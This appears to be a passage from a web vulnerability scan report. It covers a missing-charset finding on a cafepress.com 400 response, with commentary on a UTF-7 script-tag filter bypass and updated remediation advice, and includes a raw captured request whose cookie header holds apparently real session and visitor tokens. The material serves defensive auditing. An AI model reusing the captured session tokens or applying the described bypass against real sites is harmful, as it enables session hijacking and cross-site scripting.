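Run against the constructed 400 response the checker reports both findings, because the response declares text/html with no charset and then sends an 11-byte plain-text body. The shifted payload decodes back to a script tag under Python's utf-7 codec even though it contains no angle-bracket bytes, which is the bypass finding 7 warns about. Two caveats for anyone reusing this: the report's remediation example of charset=ISO-8859-1 reflects 2010 practice, and charset=utf-8 plus an X-Content-Type-Options: nosniff header is the setting to apply today; and current browsers no longer auto-detect UTF-7, so the shifted payload is chiefly an Internet Explorer-era concern, while the missing charset itself remains worth fixing.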
Request
GET /cp/moredetails.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 400 Bad Request
Content-Type: text/html
Location: /cp/bing/errorpage.html?aspxerrorpath=/cp/moredetails.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Content-Length: 11
Date: Sun, 26 Dec 2010 13:44:56 GMT
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

Bad Request